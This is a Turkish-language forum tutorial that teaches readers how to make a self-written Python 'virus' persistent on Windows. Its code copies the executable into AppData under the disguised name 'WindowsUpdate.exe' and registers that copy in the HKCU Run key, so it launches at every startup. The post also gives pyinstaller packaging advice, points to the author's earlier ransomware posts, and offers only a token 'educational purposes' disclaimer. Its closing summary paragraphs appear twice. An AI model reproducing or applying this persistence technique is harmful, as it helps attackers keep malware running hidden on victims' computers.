- 12 Kas 2023
- 207
- 82
Herkese merhaba bugün daha önceden yazdığımız bir virüsü silinse veya bilgisayar kapatılsa bile tekrardan nasıl çalıştırılır hale getiririz onu anlatacağım. Bu olaya ingilizce de "persistence" yani bilgisayar dilinde kalıcılık denir. Bizim burda yapmak istediğimiz şey hedef, bizim virüsümüzü çalıştırdığında o virüsü başka bir directory e kopyalayıp bilgisayar her açıldığında virüsü tekrardan çalıştırmak.
Önceki konularıma şuradan ulaşabilirsiniz : Python ile Hedefi Deli Etmek
Python ile RansomWare
<EĞİTİM AMAÇLIDIR, HİÇBİR SORUMLULUĞU KABUL ETMİYORUM>
Konun tamamını okumanızı öneririm herhangi bir şeyi kaçırdığınızda çalışmayabilir.
Virüs Kodu:Python ile RansomWare
<EĞİTİM AMAÇLIDIR, HİÇBİR SORUMLULUĞU KABUL ETMİYORUM>
Konun tamamını okumanızı öneririm herhangi bir şeyi kaçırdığınızda çalışmayabilir.
Python:
def display_warning():
warning_message = """
******************************************************
* *
* WARNING: YOUR SYSTEM HACKED! *
* *
******************************************************
"""
for _ in range(10):
print(warning_message)
time.sleep(1)
display_warning()
Kalıcılık kodu:
Python:
import time
import subprocess
import os
import shutil
import sys
def baslangic():
yeni_virus= os.environ["appdata"] + "\\WindowsUpdate.exe"
if not os.path.exists(yeni_virus):
shutil.copyfile(sys.executable,yeni_virus)
reg_cmd = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d " + yeni_virus
subprocess.call(reg_cmd, shell=True)
baslangic()
def display_warning():
warning_message = """
******************************************************
* *
* WARNING: YOUR SYSTEM HACKED! *
* *
******************************************************
"""
for _ in range(10):
print(warning_message)
time.sleep(1)
display_warning()
Evet arkadaşlar kodlarımız bu kadardı, şimdi açıklamaya geçelim.
Burada görmüş olduğunuz programlar bilgisayar her açıldığında çalıştırılan programlar. Bizim amacımız buraya kendi virüsümüzü eklemek. Bu ekranı "kayıt defteri düzenleyicisi" ile açtım, siz de isterseniz arama çubuğuna yazıp yukarıdaki directorylere gidip bilgisayarınız açıldığında hangi programların açılacağını kontrol edebilirsiniz.
Python:
import time
import subprocess
import os
import shutil
import sys
Python:
def baslangic():
yeni_virus = os.environ["appdata"] + "\\WindowsUpdate.exe"
Python:
if not os.path.exists(yeni_virus):
shutil.copyfile(sys.executable,yeni_virus)
reg_cmd = "reg add HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /v WindowsUpdate /t REG_SZ /d " + yeni_virus
subprocess.call(reg_cmd, shell=True)
ÖZET
Elimizde bir virüs var ve bu virüsü kalıcı hale getirmek istiyoruz. İlk kodları yazdıktan sonra bu kodları çalışır hale getirmek için exe dosyasına çevirmemiz lazım bunun için ben pyinstaller tercih ediyorum. Exe ye çevirme işleminden sonra virüsümüz çalıştığında kendisini "Gizli Klasörler" in içinde olan AppDataya "WindowsUpdate.exe" diye bir dosyaya kopyalayacak(bu ismi değiştirebilirsiniz) ve böylelikle ana virüsümüz silinse bile kopyasını silmediği sürece virüsümüz orada duracak. Sonra bu kopyalan virüsü bilgisayar her başladığında çalıştırmak için regedit kullanarak Kayıt Defterine kopya virüsümüzü ekliyoruz, böylelikle bilgisayar her başladığında virüsümüz çalıştırılacak.
gördüğünüz gibi virüsümüz çalıştırıldığı anda kendini hemen belirtilen yerlere "WindowsUpdate.exe" olarak kopyaladı.
Evet arkadaşlar konum bu kadardı okuduğunuz için teşekkürler. Yazarak anca bu kadar anlatılabiliyor anlamadığınız bir yer olursa dm atabilirsiniz. Daha başka ne tür python kodları yazabilirim belirtirseniz sevirinim.
Elimizde bir virüs var ve bu virüsü kalıcı hale getirmek istiyoruz. İlk kodları yazdıktan sonra bu kodları çalışır hale getirmek için exe dosyasına çevirmemiz lazım bunun için ben pyinstaller tercih ediyorum. Exe ye çevirme işleminden sonra virüsümüz çalıştığında kendisini "Gizli Klasörler" in içinde olan AppDataya "WindowsUpdate.exe" diye bir dosyaya kopyalayacak(bu ismi değiştirebilirsiniz) ve böylelikle ana virüsümüz silinse bile kopyasını silmediği sürece virüsümüz orada duracak. Sonra bu kopyalan virüsü bilgisayar her başladığında çalıştırmak için regedit kullanarak Kayıt Defterine kopya virüsümüzü ekliyoruz, böylelikle bilgisayar her başladığında virüsümüz çalıştırılacak.
gördüğünüz gibi virüsümüz çalıştırıldığı anda kendini hemen belirtilen yerlere "WindowsUpdate.exe" olarak kopyaladı.
Evet arkadaşlar konum bu kadardı okuduğunuz için teşekkürler. Yazarak anca bu kadar anlatılabiliyor anlamadığınız bir yer olursa dm atabilirsiniz. Daha başka ne tür python kodları yazabilirim belirtirseniz sevirinim.